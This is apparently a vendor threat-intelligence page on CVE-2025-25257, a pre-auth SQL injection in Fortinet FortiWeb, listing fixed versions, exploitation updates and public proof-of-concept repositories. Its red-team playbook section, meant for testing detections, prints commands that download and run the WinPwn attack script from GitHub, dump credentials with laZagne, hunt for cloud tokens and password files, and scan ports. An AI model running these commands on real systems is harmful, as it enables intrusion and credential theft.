CVE-2025-25257
Overview
This vulnerability is an SQL Injection flaw caused by improper neutralization of special elements within SQL commands processed by Fortinet FortiWeb. The root cause lies in insufficient input validation and sanitization of HTTP/HTTPS request parameters, specifically in the Authorization header. The affected component is the FortiWeb API endpoint handling fabric device status queries, which fails to properly handle crafted input leading to injection of unauthorized SQL commands.
Vulnerability Description
An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] vulnerability in Fortinet FortiWeb 7.6.0 through 7.6.3, FortiWeb 7.4.0 through 7.4.7, FortiWeb 7.2.0 through 7.2.10, FortiWeb 7.0.0 through 7.0.10 allows an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
Impact
An unauthenticated attacker can exploit this vulnerability to execute arbitrary SQL commands on the backend database, leading to unauthorized data access, data modification, or deletion. This can result in exposure of sensitive information, compromise of system integrity, and potential full system control. No user interaction or valid credentials are required, enabling remote exploitation and significant business impact such as data breaches or operational disruption.
Solution
Fortinet has released security updates addressing this vulnerability in FortiWeb versions 7.0.11, 7.2.11, 7.4.8, and 7.6.4. Administrators should apply these patches promptly. Detailed patch instructions and advisory information are available at the Fortinet PSIRT page: https://fortiguard.fortinet.com/psirt/FG-IR-25-151. No specific workarounds are recommended; upgrading to the fixed versions is the advised remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Fortinet's FortiWeb products stems from improper handling of special characters within SQL commands, leading to an SQL injection flaw. This type of vulnerability occurs when user input is not adequately sanitized before being included in SQL queries. In the affected versions of FortiWeb, an attacker can exploit this weakness by crafting malicious HTTP or HTTPS requests that contain specially formatted SQL code. When these requests are processed by the web application, the embedded SQL commands can be executed by the database, allowing unauthorized access to sensitive data or manipulation of the database itself.
Attack vectors for this vulnerability are particularly concerning due to the unauthenticated nature of the exploitation. An attacker does not need prior access or credentials to initiate an attack, which significantly lowers the barrier to entry. By sending crafted requests to the FortiWeb application, an attacker can execute arbitrary SQL commands. This could lead to various outcomes, including data exfiltration, data modification, or even complete control over the database. Scenarios may involve an attacker retrieving user credentials, sensitive business information, or even administrative access to the application itself. The ability to manipulate the database can also lead to denial-of-service conditions if the attacker chooses to delete critical data or disrupt normal operations.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on FortiWeb for web application security. The potential for unauthorized data access poses significant business risks, including regulatory penalties for data breaches, loss of customer trust, and reputational damage. Organizations in regulated industries, such as finance or healthcare, may face heightened scrutiny and legal repercussions if sensitive data is compromised. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability is critical and should be prioritized for remediation to prevent exploitation.
Detection and mitigation strategies should focus on both immediate and long-term measures. Organizations should implement robust input validation and sanitization practices to prevent SQL injection attacks. Regular security assessments, including penetration testing and code reviews, can help identify and remediate vulnerabilities before they can be exploited. Additionally, updating to the latest versions of FortiWeb that address this vulnerability is crucial. Employing web application firewalls (WAFs) that can detect and block malicious SQL injection attempts can also serve as an additional layer of defense. Monitoring logs for unusual query patterns or unexpected database behavior can aid in the early detection of potential exploitation attempts.
In conclusion, the SQL injection vulnerability in Fortinet's FortiWeb products presents a significant threat to organizations using these systems. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate attention and action. By adopting comprehensive security practices, organizations can mitigate the risks associated with this vulnerability and protect their sensitive data from unauthorized access and manipulation.
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2025-25257, reflecting increased exploitation attempts against Fortinet FortiWeb deployments. This uptick is accompanied by a measurable rise in the Exploit Prediction Scoring System (EPSS), signaling a growing likelihood of successful exploitation in operational environments. Concurrently, new proof-of-concept exploits have surfaced publicly, broadening the attack surface by lowering the technical barrier for threat actors to weaponize this critical SQL injection vulnerability. Although ransomware groups previously linked to FortiWeb compromises remain unconfirmed in association with this CVE, the evolving exploit landscape underscores the potential for opportunistic adversaries to leverage this flaw for unauthorized data access or lateral movement. For defenders, this escalation necessitates heightened vigilance in monitoring FortiWeb instances for anomalous database queries and suspicious HTTP request patterns. The increased exploitation momentum elevates the overall threat level, reinforcing the urgency for organizations to prioritize detection and response capabilities tailored to this vulnerability.
Update 2 — June 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-25257, with telemetry indicating a significant surge in malicious activity exploiting this critical SQL injection vulnerability. The Exploit Prediction Scoring System (EPSS) score has surged dramatically, reflecting a rapidly increasing likelihood of exploitation in the wild. Concurrently, new proof-of-concept exploits have emerged across multiple public repositories, broadening the accessibility of attack tools to a wider range of adversaries. Although ransomware groups previously linked to FortiWeb compromises remain unconfirmed in association with this vulnerability, the increased exploitation momentum and expanded exploit availability elevate the risk of unauthorized data access and potential lateral movement within affected environments. For defenders, this shift underscores an urgent need to intensify monitoring and threat detection efforts, as the threat landscape surrounding this vulnerability has become more active and dynamic. Consequently, the overall threat level for CVE-2025-25257 has escalated from high to critical, reflecting its growing exploitation prevalence and the expanding attacker toolkit.
Update 3 — July 09, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-25257, accompanied by the continued availability of multiple proof-of-concept tools that facilitate unauthorized SQL command execution on vulnerable Fortinet FortiWeb versions. While the overall exploitation momentum remains stable, the incremental rise in detection activity signals persistent attacker interest and ongoing probe efforts. Notably, no new ransomware campaigns have been linked to this vulnerability despite its association with several ransomware groups, indicating that exploitation is currently focused on reconnaissance and initial access rather than direct ransomware deployment. This subtle uptick in activity, combined with the broad accessibility of exploitation resources, underscores an elevated risk of unauthorized data exposure and potential lateral movement within compromised environments. Consequently, the threat level for CVE-2025-25257 remains critical, with defenders urged to maintain heightened vigilance as adversaries continue refining their tactics around this vulnerability.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution | Milad Karimi (Ex3ptionaL) | webapps | multiple | - | View |
GitHub PoCs (12)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257
|
watchtowrlabs | 99 | 25 | 2025-07-10 | View |
|
0xbigshaq/CVE-2025-25257
FortiWeb CVE-2025-25257 exploit
|
0xbigshaq | 64 | 11 | 2025-07-11 | View |
|
TheStingR/CVE-2025-25257
Public PoC for CVE-2025-25257: FortiWeb pre-auth SQLi to RCE
|
TheStingR | 5 | 1 | 2025-07-19 | View |
|
aitorfirm/CVE-2025-25257
Exploiting the CVE-2025-25257 vulnerability in FortiWeb. This repository demonstrates secure pre-authenticated SQL injec...
|
aitorfirm | 1 | 2 | 2025-07-12 | View |
|
mrmtwoj/CVE-2025-25257
CVE‑2025‑25257 is a critical pre-authentication SQL injection vulnerability affecting Fortinet FortiWeb’s
|
mrmtwoj | 1 | 1 | 2025-07-19 | View |
|
segfault-it/CVE-2025-25257
A working (at least for me :] ) exploit for CVE-2025-25257
|
segfault-it | 1 | 0 | 2025-09-21 | View |
|
imbas007/CVE-2025-25257
|
imbas007 | 1 | 0 | 2025-07-12 | View |
|
0xgh057r3c0n/CVE-2025-25257
PoC for CVE-2025-25257, a critical unauthenticated SQL injection in FortiWeb. Exploits SQLi via the Authorization header...
|
0xgh057r3c0n | 1 | 0 | 2025-07-15 | View |
|
adilburaksen/CVE-2025-25257-Exploit-Tool
Tool for detecting and exploiting CVE-2025-25257 in Fortinet FortiWeb.
|
adilburaksen | 0 | 0 | 2025-07-12 | View |
|
mr-r3b00t/CVE-2025-25257
CVE-2025-25257 PoC for educational use and/or authorised pentesting.
|
mr-r3b00t | 0 | 0 | 2025-11-11 | View |
|
lytianahkone-boop/cve-2025-25257
|
lytianahkone-boop | 0 | 0 | 2025-12-16 | View |
|
GarethMSheldon/Fortinet-FortiWeb-Fabric-Connector-CVE-2025-25257-Detection
This repository provides production-ready detection engineering content for **CVE-2025-25257**, a pre-authentication SQL...
|
GarethMSheldon | 0 | 0 | 2026-03-01 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-25257 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-25-151 |
| packetstorm.news |
NVD API
Exploit
Third Party Advisory
VDB Entry
|
https://packetstorm.news/files/id/210193/ |
| exploit-db.com |
NVD API
Exploit
Third Party Advisory
VDB Entry
|
https://www.exploit-db.com/exploits/52473 |
| github.com |
NVD API
Third Party Advisory
|
https://github.com/0xbigshaq/CVE-2025-25257 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-25257 |